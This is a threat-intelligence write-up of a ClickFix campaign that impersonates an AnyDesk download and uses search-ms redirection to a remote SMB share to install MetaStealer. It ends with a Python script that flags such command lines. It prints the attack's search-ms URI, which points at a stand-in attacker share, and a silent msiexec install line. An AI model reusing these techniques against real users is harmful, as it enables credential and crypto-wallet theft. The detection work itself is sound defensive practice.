A new variant of the ClickFix attack has recently emerged, masquerading as a legitimate AnyDesk installer to deploy the MetaStealer infostealer.
The campaign uses a fake Cloudflare Turnstile verification page to lure victims into triggering a crafted Windows protocol handler, ultimately delivering a malicious MSI package disguised as a PDF.
As organizations continue to harden their defenses against traditional social-engineering techniques, threat actors are evolving their playbooks, blending familiar lures with unexpected system components to bypass detection and steal sensitive credentials.
In early August, users searching for the AnyDesk remote access tool encountered a deceptive landing page at anydeesk[.]ink/download/anydesk.html.
The page displayed what appeared to be a standard Cloudflare Turnstile prompt, complete with a “verify you are human” button.
The initial link that redirects users to a fake Cloudflare Turnstile (Source – Huntress)
Upon clicking, victims were not instructed to paste a command into the Run dialog box as in classic ClickFix attacks; instead they were redirected into Windows File Explorer via the search-ms URI handler.
Huntress researchers noted that this subtle shift in redirection mechanism capitalized on the less-monitored Windows Search protocol, catching security teams off guard.
Windows File Explorer redirection via search-ms (Source – Huntress)
The infection chain unfolds when the search-ms URI invokes a remote SMB share, delivering a Windows shortcut file named “Readme Anydesk.pdf.lnk” to the victim’s system.
Unlike FileFix variants that rely on clipboard-pasted PowerShell commands, this attack automatically launches the LNK payload, which in turn executes a script to download and install two components: the genuine AnyDesk installer hosted on Microsoft Edge for plausibility, and a decoy PDF served from chat1[.]store.
The decoy file is in fact an MSI package whose download URL dynamically incorporates the victim’s hostname via the %COMPUTERNAME% environment variable. Once downloaded, the MSI is installed via:
msiexec /i "%TEMP%\%COMPUTERNAME%.msi" /quiet
After this command completes, metadata reveals two primary artifacts: a CustomActionDLL responsible for orchestrating the setup and a CAB archive containing ls26.exe, the MetaStealer dropper, and cleanup scripts.
Displayname parameter revealing the SMB share (Source – Huntress)
Huntress analysts identified that ls26.exe is protected with Private EXE Protector and exhibits characteristic MetaStealer behaviors, including credential harvesting from browsers and crypto-wallet theft.
Infection Mechanism
At the heart of this campaign lies the inventive use of Windows Search. By invoking the search-ms URI protocol, attackers bypass Run dialog restrictions in hardened environments and introduce payloads directly through File Explorer.
The following URI snippet illustrates the redirection:
search-ms:displayname=AnyDesk%20Secure%20Access;crumb=location:attacker-smbshare
Once the user confirms the File Explorer prompt, the LNK file silently executes the download routines. The MSI’s CustomActionDLL then triggers the retrieval of Binary.bz.WrappedSetupProgram, which unpacks ls26.exe and 1.js.
The JavaScript file removes the intermediary files, while ls26.exe initiates the data exfiltration phase.
By abusing legitimate Windows protocols and file handling, this attack evades sandbox detection and security alerts until the final payload unleashes its malicious logic.
This emerging tactic underscores the importance of monitoring unconventional uses of trusted system features.
Defenders should consider implementing strict protocol handler policies, SMB auditing, and contextual analysis of MSI installations to detect and disrupt these sophisticated social-engineering campaigns.
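Added example (not Huntress’s code or tooling): a small Python triage script that applies the three detection ideas above to constructed process-creation command lines, flagging search-ms URIs whose crumb points at a remote UNC share, quiet msiexec installs from a Temp directory, and MSI files named after the hostname. The IP address, paths and hostname are made-up sample values.

```python
import re
from urllib.parse import unquote

# Constructed sample process-creation command lines, not taken from the article.
SAMPLE_EVENTS = [
    r'explorer.exe "search-ms:displayname=AnyDesk%20Secure%20Access;crumb=location:\\203.0.113.7\share"',
    r'explorer.exe "search-ms:displayname=Docs;crumb=location:C:\Users\alice\Documents"',
    r'msiexec /i "C:\Users\alice\AppData\Local\Temp\WS-ALICE.msi" /quiet',
    r'msiexec /i "C:\Users\alice\Downloads\7zip.msi"',
]

def parse_search_ms(cmdline):
    """Return the search-ms parameters as a dict, or None if the line has no search-ms URI."""
    m = re.search(r'search-ms:([^"\s]+)', cmdline, re.IGNORECASE)
    if not m:
        return None
    params = {}
    for part in m.group(1).split(";"):
        key, _, value = part.partition("=")
        params[key.lower()] = unquote(value)  # decode %20 etc. in displayname/crumb
    return params

def remote_search_location(params):
    """True when the crumb points at a UNC path (remote share) instead of a local folder."""
    location = params.get("crumb", "").partition("location:")[2]
    return location.startswith(("\\\\", "//"))

def quiet_temp_msi(cmdline):
    """True for a silent msiexec install of an MSI located in a Temp directory."""
    c = cmdline.lower()
    silent = "/quiet" in c or "/qn" in c
    return "msiexec" in c and silent and re.search(r'\\temp\\[^"\\]+\.msi', c) is not None

def msi_named_after_host(cmdline, hostname):
    """True when the MSI file name equals the host name, matching the %COMPUTERNAME%.msi pattern."""
    m = re.search(r'([^\\/"]+)\.msi', cmdline, re.IGNORECASE)
    return m is not None and m.group(1).lower() == hostname.lower()

def triage(events, hostname):
    """Return (rule, command line) pairs for every event that trips a check."""
    checks = [
        ("search-ms crumb points to remote share",
         lambda c: (p := parse_search_ms(c)) is not None and remote_search_location(p)),
        ("quiet MSI install from Temp", quiet_temp_msi),
        ("MSI named after hostname", lambda c: msi_named_after_host(c, hostname)),
    ]
    return [(rule, c) for c in events for rule, check in checks if check(c)]
```

Run against real telemetry by feeding in the CommandLine field of Sysmon event ID 1 or Security event 4688 records instead of SAMPLE_EVENTS.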